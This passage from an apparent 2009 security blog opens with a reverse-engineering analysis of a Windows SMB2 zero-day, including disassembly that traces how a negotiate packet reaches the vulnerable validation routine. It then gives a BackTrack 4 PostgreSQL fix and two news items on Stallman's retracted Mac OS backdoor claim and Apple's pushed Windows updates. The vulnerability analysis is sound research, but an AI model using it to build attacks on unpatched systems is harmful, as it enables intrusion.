The _NullProviderName is a pointer to a provider name structure similar to the one passed as an argument to _SrvRegisterProvider(). The NULL provider above (_NullProvider) is the first provider initialized by SrvInitializeProviderList() (and used in cleanup code); it is also the first entry in a linked list of provider structures. The service provider list (_SrvProviderList) is first initialized with a pointer to this NULL entry. Each call to _SrvRegisterProvider() will subsequently add a new entry to the end of the linked list.

At this point we understand that the provider which leads to the vulnerable code is going to be added to a linked list with the other 3 providers. We can then move on to SrvProcessPacket() where we see this structure is accessed:

PAGE:0002FA40 mov     eax, _SrvProviderList

PAGE:0002FA45 mov     [esi+15Ch], eax

PAGE:0002FA62

PAGE:0002FA62 loc_2FA62:              ;

PAGE:0002FA62 mov     eax, [esi+15Ch] ; EAX = &cur_provider;

PAGE:0002FA68 mov     ecx, [eax+1Ch]

PAGE:0002FA6B test    [esi+158h], ecx

PAGE:0002FA71 jz      short loc_2FA7E

PAGE:0002FA73 push    esi

PAGE:0002FA74 call    dword ptr [eax+20h] ; cur_provider->CallBack()

PAGE:0002FA77 cmp     eax, STATUS_MORE_PROCESSING_REQUIRED

PAGE:0002FA7C jnz     short loc_2FA99

PAGE:0002FA7E

PAGE:0002FA7E loc_2FA7E:              ;

PAGE:0002FA7E mov     eax, [esi+15Ch] ; EAX = &cur_provider

PAGE:0002FA84 mov     eax, [eax+14h]

PAGE:0002FA87 cmp     eax, edi        ; EDI = 0

PAGE:0002FA89 mov     [esi+15Ch], eax ; cur_provider = cur_provider->next

PAGE:0002FA8F jnz     short loc_2FA62

The code above is initializing a variable with a pointer to the head of the linked list of providers (_NullProvider), then iterating through the list to discover if it needs to take action. This is the point where the vulnerable routine is called. The validation routine will first be called via Smb2ValidateProviderCallback(), and if more processing is required and no error occurs (which will be the case with most, if not all of the callbacks in the validation provider), STATUS_MORE_PROCESSING_REQUIRED will be returned and the next call will be to the _Smb2ExecuteProviderCallback() routine, which is the Smb2Execute provider that is registered after the validation provider.

The structure pointed to by ESI in the code above is heavily used throughout the code and wasn’t fully reversed. It is a 0×410 byte structure that is initialized by SrvAllocateWorkItemForConnection() and contains some data used to maintain the work queue. At the base of the structure is a pointer to the actual data from the packet.

The SrvProcessPacket() routine will eventually be called by SrvReceiveHandler(), which was registered in the device extension array inside of srvnet.sys. Once SrvProcessPacket() is called, the faulting routine will be reached after some more processing. It is important to remember that this will only occur if SrvNegotiateHandler() is successful, meaning the SMB command must be 0×72.

The vulnerable routine, Smb2ValidateProviderCallback(), begins by checking the first 4 bytes of the buffer for two different versions of the SMB header:

.text:000172F8

.text:000172F8 loc_172F8:

.text:000172F8 mov     edx, [esi]

.text:000172FA cmp     edx, 'BMS¦'

.text:00017300 jz      short loc_17343

.text:00017302 cmp     edx, 424D53FFh ; BMS\xFF

.text:00017308 jnz     short loc_1731A

The routine then proceeds down to perform various processing depending on what the version in the SMB header was, eventually pulling the WORD from the SMB packet and using it in the index as demonstrated earlier.

From: http://www.secureworks.com/research/threats/windows-0day

Error with Postgresql in BackTrack 4 pre-Final

longjidin — Sat, 03 Oct 2009 12:06:54 +0000

Setting up postgresql-8.3 (8.3.8-0ubuntu8.10) …
Starting PostgreSQL 8.3 database server: main* The PostgreSQL server failed to start. Please check the log output:
2009-09-29 12:21:43 BST FATAL: could not load server certificate file “server.crt”: No such file or directory
failed!
invoke-rc.d: initscript postgresql-8.3, action “start” failed.
dpkg: error processing postgresql-8.3 (–configure):
subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of postgresql:
postgresql depends on postgresql-8.3; however:
Package postgresql-8.3 is not configured yet.
dpkg: error processing postgresql (–configure):
dependency problems – leaving unconfigured
No apport report written because the error message indicates its a followup error from a previous failure.
Errors were encountered while processing:
postgresql-8.3
postgresql
E: Sub-process /usr/bin/dpkg returned an error code (1)

——————————————————————————————————————

OK now pen console then type :-

cd /etc/ssl/certs
ls -ld /etc/ssl/private
sudo ls -l /etc/ssl/private/
make-ssl-cert generate-default-snakeoil –force-overwrite
————————————————————————————
BackTrack 4 Pre Final Kernel Update

apt-get update
apt-get install -d linux-image
cd /var/cache/apt/archives/
dpkg -i –force all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
apt-get dist-upgrade
apt-get install madwifi-drivers
apt-get install r8187-drivers

————————————————————————————

After a reboot, type this command:

fix-splash

now you will get no error with Postgresql

enjoy the BackTrack 4 pre-Final

thanks to CONSOLE

Stallman backpedals on Mac OS backdoor claims

longjidin — Thu, 01 Oct 2009 03:37:12 +0000

Free software activist Richard Stallman has withdrawn an accusation that Apple’s Mac OS X contained a backdoor after admitting there was no evidence to substantiate his earlier claims. Stallman has repeatedly levelled charges that Apple could forcibly impose software changes in Mac OS X. He now admits his opinion was influenced by unsubstantiated gripes against Apple’s operating system and that there is “no evidence that Apple has installed software changes without the user’s permission.”

“We have no way to verify that there is no backdoor in Mac OS X that could install changes without permission, but that is no basis to claim there is one,” Stallman writes in a post on his FSF blog on Monday. “I apologize for repeating a criticism of Mac OS which I cannot substantiate and must presume is false.”

Even after ditching the backdoor claim, Stallman predictably remains a staunch critic of Apple’s DRM (copyright technology) push.

“While Apple has not, it seems, imposed changes by force, it has a record of making users install harmful changes on pain of losing functionality, and misleading users about what these changes do.”

For example, back in 2005, Apple insisted users needed to upgrade to iTunes 4.7 to use its music store. According to Stallman, Apple misled its users in describing this as a security upgrade. In reality, the change was designed to “change the iTunes system of Digital Restrictions Management (DRM) to make PyMusique stop working.” PyMusique was a free software application that allowed GNU/Linux users to access the iTunes store. This isn’t an isolated example, according to Stallman, who accused Apple of sneaking a DRM into Quicktime last year that “stopped users from playing video files they themselves had made.”

Stallman concludes that while he no longer believes Mac OS X has a backdoor, he doesn’t regard it as all above board either. He is certainly not a candidate for an iBook, much less an iPhone. Stallman’s privacy concerns are such that he avoids using mobiles in general.

“If Mac OS X does not have a backdoor to forcibly install changes, that does not make it ethical,” Stallman concludes. “It has other malicious features, such as Digital Restrictions Management.

“What makes those malfeatures possible is that users can’t remove them. Mac OS is proprietary software, so the users don’t have control over it – rather, the developer has sole control over the program, and employs it as an instrument of control over the users. So I don’t withdraw my condemnation of Mac OS. But I do withdraw the claim that it has a known backdoor.” ®

Apple pushes unnecessary software to Windows PCs

longjidin — Thu, 01 Oct 2009 03:11:33 +0000

But within hours, it pulls enterprise tool from update list

Apple again used its software update tool to push a program that was previously not installed on PCs, according to Computerworld tests early Monday. Later in the day, however, Apple removed the software from the update list. Apple’s Software Update for Windows — a utility most often installed on PCs when users download iTunes — was offering something called “iPhone Configuration Utility” to Windows users, even those who have never connected an iPhone to their computers. Popular Windows blogger Ed Bott first reported on ZDNet that the tool was included in new updates. Computerworld confirmed that the 22MB download was offered to PCs — including those running Windows XP Service Pack 3 (SP3) and Vista SP2 — that had never been used to synchronize an iPhone. The tool, chimed in Simon Bisson of itexpertmag.com, is actually an enterprise-grade tool for network administrators, who use it to create and deploy device profiles so users can securely connect to a company’s Exchange mail servers. According to Bisson, the iPhone Configuration Utility also adds the open-source Apache Web server software to the PC. “The thing with that iPhone config utility is that it’s an enterprise tool for building device profiles. It’s not for consumers!” Bisson said on Twitter.

Apple has been criticized in the past for using its software updating service to push unwanted software. Last year, for example, the company came under fire for offering Safari for Windows to users who had not installed the application, going so far as to pre-check the program so that users who simply accepted the default downloads received the browser. John Lilly, the CEO of Mozilla, the open-source developer responsible for Firefox, said Apple’s tactic “undermines the Internet” because updates are traditionally used to patch or fix existing software, not install new programs.

Later, Apple quietly changed Software Update so that Safari was unchecked, requiring users to explicitly request the browser. By 3:30 p.m. EST, Apple Software Update had dropped the iPhone Configuration Utility as a potential update to the same PCs that had earlier indicated the tool should be downloaded. Apple did not immediately respond to questions about why the iPhone utility had been offered, and whether the company had erred in listing it as an update for Windows users.